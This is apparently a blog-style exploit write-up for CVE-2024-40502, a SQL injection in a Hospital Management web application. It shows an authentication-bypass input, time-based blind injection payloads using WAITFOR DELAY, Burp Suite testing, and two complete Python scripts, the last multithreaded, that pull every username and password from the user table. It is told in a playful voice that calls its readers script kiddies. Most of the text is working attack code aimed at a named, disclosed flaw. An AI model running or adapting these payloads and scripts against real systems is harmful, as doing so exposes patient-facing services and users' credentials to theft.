Blind SQL Exploit

Upping the ante. A blind SQL exploit for CVE-2024-40502.

I'm writing this in much more casual manner that I normally do. Its 12am, I'm feeling delusional and sleep deprived, I have work at 7am. Lets get to crackin.

OH look a Hospital Management web application. It would be a shame… if someone… Dumped the user database…. And that’s exactly what we gonna do.

We know the username and password fields are SQL injectable
We can login into any user account we want by entering {username}'--
That is boring lets dump the user tables using a white box approach

Database Structure

User Table Structure

Proof of Concept

Now when we successfully login with our SQL injection payload, there is nothing rendered in HTML from the database. Sad. That would have made this entire process too trivial though. Blind SQL injection it is!

Lets craft a blind sql injection query using our knowledge of the database structure to 1 by 1 enumerate each character in the first row of the username 'Uname' field. Starting simple with 1 character, it looks something like this:

'; IF (SELECT SUBSTRING(Uname, 1, 1) FROM UserTab WHERE Id = 1) = 'j' WAITFOR DELAY '00:00:10'; --

Enter Burpsuite

Lets Use Burp to speed up our testing phase:

I dropped our payload in the 'ctl00%24ContentPlaceHolder1%24txt_login_username' parameter. Again we are testing the 1st position character of the Username field which we know to be true for the character 'j'. Take a look at the response time 12,062 milli seconds, that looks about right. Just to be sure lets test with a character that will result in false in order to not trigger our delay.

Wow 5 milli seconds, that’s a substantial difference and that’s good enough for me.

Now lets do our due dillegnece and ensure our code works for the second string position, all we need to do is alter the substring function in our sql query like so:

'; IF (SELECT SUBSTRING(Uname, 2, 1) FROM UserTab WHERE Id = 1) = 'a' WAITFOR DELAY '00:00:10'; --

I'll spare you the details it worked, can you say wahoo.

Now obviously I'm not gonna sit here like some chump and test each character one by one. We're script kiddies lets live up to our names and script this ish.

Enter Python

Starting out simple for a proof of concept lets automate the first char:

import requests
import string
import time
import urllib3
import warnings
# Suppress only the specific InsecureRequestWarning from urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# Base URL and headers for the request
url = 'https://localhost:44306/Users/Loginpage.aspx'
headers = {
	   'Host': 'localhost:44306',
	   'Content-Type': 'application/x-www-form-urlencoded',
	   'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.50 Safari/537.36',
	   'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7',
	   'Referer': 'https://localhost:44306/Users/Loginpage.aspx',
	   'Accept-Encoding': 'gzip, deflate',
	   'Accept-Language': 'en-US,en;q=0.9'
	 }
# The base payload template with a placeholder for the character
payload_template = (
	    "__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwULLTE5MDkwMzg1MjhkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBSNjdGwwMCRDb250ZW50UGxhY2VIb2xkZXIxJENoZWNrQm94MftfyUqUBaNeVs9%2BD0GCHC%2BDpjDEq1%2BdD37NAET9vSn0&"
	    "ctl00%24ContentPlaceHolder1%24txt_login_username='; IF (SELECT SUBSTRING(Uname, 1, 1) FROM UserTab WHERE Id = 1) = '{char}' WAITFOR DELAY '00:00:05'; --&"
	    "ctl00%24ContentPlaceHolder1%24txt_login_pass=test&ctl00%24ContentPlaceHolder1%24btn_login_b=Login&__VIEWSTATEGENERATOR=F07E6E9A&"
	    "__EVENTVALIDATION=%2FwEdAAaAgSgigdNCmxIvEYdJg3G%2FNF87LwWBPM7KoN9MDoBshox%2F%2FbRdslveTViDKRDkmzW4Z67AOU%2FkzhzLV6X3P9qDNES5GijeIbosQC2kxpAQ0huJ926NKJs4PPaUc35EfPpujopDPWsk91KKJTjUn7fb4ZxctR8ks%2BWIjgjdKw1mgw%3D%3D"
	    )
	
# Characters to test, including all letters, digits, and common symbols
test_chars = string.ascii_letters + string.digits + string.punctuation
# Iterate through each character and send the request
for char in test_chars:
# Replace the placeholder with the current character
	payload = payload_template.format(char=char)
	    
	# Record the start time
	start_time = time.time()
	    
	# Send the POST request
	response = requests.post(url, headers=headers, data=payload, verify=False)
	    
	# Record the end time
	end_time = time.time()
	    
	# Calculate the response time
	response_time = end_time - start_time
	    
	# Output the character and response time
	print(f"Character: {char} | Response Time: {response_time:.4f} seconds")

Output:

Our POC script is looking promising. We know the first character in the first user name is 'j' and we can see that reflected in the response time.

Enter Final Exploit

Alright code happened here's a revised script we can use to enumerate the entire database, at least the parts I care about. Username and Password. Boy oh boy running this on IIS express through visual studio was a pain in the ass given how slow it is compared to a real server. I tried beefing up this script with multi threading to speed up the process. I would hope it runs faster testing against a real server. I was able to enumerate the 1st row in about 5 minutes ish. Also don't freak I modded the db a bit to speed up this process for my proof of concept. This still works on more complex credentials. Enuf chit chat here's the good stuff.

(Oh yeah, I added some edgy ascii art and a cool name cause why not)

import requests
import string
import time
import urllib3
import warnings
import concurrent.futures
from prettytable import PrettyTable

# Suppress only the specific InsecureRequestWarning from urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# Base URL and headers for the request
url = 'https://localhost:44306/Users/Loginpage.aspx'


headers = {
    'Host': 'localhost:44306',
    'Content-Type': 'application/x-www-form-urlencoded',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.50 Safari/537.36',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7',
    'Referer': 'https://localhost:44306/Users/Loginpage.aspx',
    'Accept-Encoding': 'gzip, deflate',
    'Accept-Language': 'en-US,en;q=0.9'
}

# The base payload template with placeholders for the character, position, and ID
payload_template = (
    "__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwULLTE5MDkwMzg1MjhkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBSNjdGwwMCRDb250ZW50UGxhY2VIb2xkZXIxJENoZWNrQm94MftfyUqUBaNeVs9%2BD0GCHC%2BDpjDEq1%2BdD37NAET9vSn0&"
    "ctl00%24ContentPlaceHolder1%24txt_login_username='; IF (SELECT SUBSTRING({column}, {pos}, 1) FROM UserTab WHERE Id = {id}) = '{char}' WAITFOR DELAY '00:00:10'; --&"
    "ctl00%24ContentPlaceHolder1%24txt_login_pass=test&ctl00%24ContentPlaceHolder1%24btn_login_b=Login&__VIEWSTATEGENERATOR=F07E6E9A&"
    "__EVENTVALIDATION=%2FwEdAAaAgSgigdNCmxIvEYdJg3G%2FNF87LwWBPM7KoN9MDoBshox%2F%2FbRdslveTViDKRDkmzW4Z67AOU%2FkzhzLV6X3P9qDNES5GijeIbosQC2kxpAQ0huJ926NKJs4PPaUc35EfPpujopDPWsk91KKJTjUn7fb4ZxctR8ks%2BWIjgjdKw1mgw%3D%3D"
)

# Characters to test, including all letters, digits, and common symbols
test_chars = [ 'a','b','c','d','e','f','g','h','i','j','k','l','m','n','o',
          'p','q','r','s','t','u','v','w','x','y','z','A','B','C','D',
          'E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S',
          'T','U','V','W','X','Y','Z','0','1','2','3','4','5','6','7',
          '8','9','@','#']

def get_next_char(column, pos, user_id):
    for char in test_chars:
        # Replace the placeholders with the current character, position, and ID
        payload = payload_template.format(column=column, char=char, pos=pos, id=user_id)

        # Record the start time
        start_time = time.time()

        # Send the POST request
        response = requests.post(url, headers=headers, data=payload, verify=False)

        # Record the end time
        end_time = time.time()

        # Calculate the response time
        response_time = end_time - start_time

        # Check if the response time is greater than 6 seconds
        if response_time > 6:
            return char
    return None

def extract_value(column, user_id):
    value = ""
    position = 1
    while True:
        with concurrent.futures.ThreadPoolExecutor(max_workers=20) as executor:
            future = executor.submit(get_next_char, column, position, user_id)
            result = future.result()
            if result:
                value += result
                print(f"Found valid character: {result} | Current {column}: {value} (ID: {user_id})")
                position += 1
            else:
                print(f"{column} found: {value} for ID: {user_id}")
                break
    return value

ascii_art = """
  ██████   █████   ██▓        ██▀███  ▓█████ ▄▄▄       ██▓███  ▓█████  ██▀███  
▒██    ▒ ▒██▓  ██▒▓██▒       ▓██ ▒ ██▒▓█   ▀▒████▄    ▓██░  ██▒▓█   ▀ ▓██ ▒ ██▒
░ ▓██▄   ▒██▒  ██░▒██░       ▓██ ░▄█ ▒▒███  ▒██  ▀█▄  ▓██░ ██▓▒▒███   ▓██ ░▄█ ▒
  ▒   ██▒░██  █▀ ░▒██░       ▒██▀▀█▄  ▒▓█  ▄░██▄▄▄▄██ ▒██▄█▓▒ ▒▒▓█  ▄ ▒██▀▀█▄  
▒██████▒▒░▒███▒█▄ ░██████▒   ░██▓ ▒██▒░▒████▒▓█   ▓██▒▒██▒ ░  ░░▒████▒░██▓ ▒██▒
▒ ▒▓▒ ▒ ░░░ ▒▒░ ▒ ░ ▒░▓  ░   ░ ▒▓ ░▒▓░░░ ▒░ ░▒▒   ▓▒█░▒▓▒░ ░  ░░░ ▒░ ░░ ▒▓ ░▒▓░
░ ░▒  ░ ░ ░ ▒░  ░ ░ ░ ▒  ░     ░▒ ░ ▒░ ░ ░  ░ ▒   ▒▒ ░░▒ ░      ░ ░  ░  ░▒ ░ ▒░
░  ░  ░     ░   ░   ░ ░        ░░   ░    ░    ░   ▒   ░░          ░     ░░   ░ 
      ░      ░        ░  ░      ░        ░  ░     ░  ░            ░  ░   ░     

by: 0xMykull
"""

print(ascii_art)

# List to store results
results = []

# Loop through IDs until no more usernames are found
user_id = 1
while True:
    # Extract username
    username = extract_value('Uname', user_id)

    # If no username is found, stop the loop
    if not username:
        break

    # Extract password
    password = extract_value('Pass', user_id)

    # Store the result in the list
    results.append({"ID": user_id, "Username": username, "Password": password})

    # Move to the next ID
    user_id += 1

# Display results in an ASCII table
table = PrettyTable()
table.field_names = ["ID", "Username", "Password"]
for result in results:
    table.add_row([result["ID"], result["Username"], result["Password"]])

print(table)

Output:

(That ascii art lookin pretty cool now huh?)

PreviousCVE-2024-40502 NextArch Linux Rice

Last updated 1 year ago

Hospital Management Login Page

Database Structure

User Table Structure

Proof of Concept

Enter Burpsuite

Enter Python

Enter Final Exploit

Output: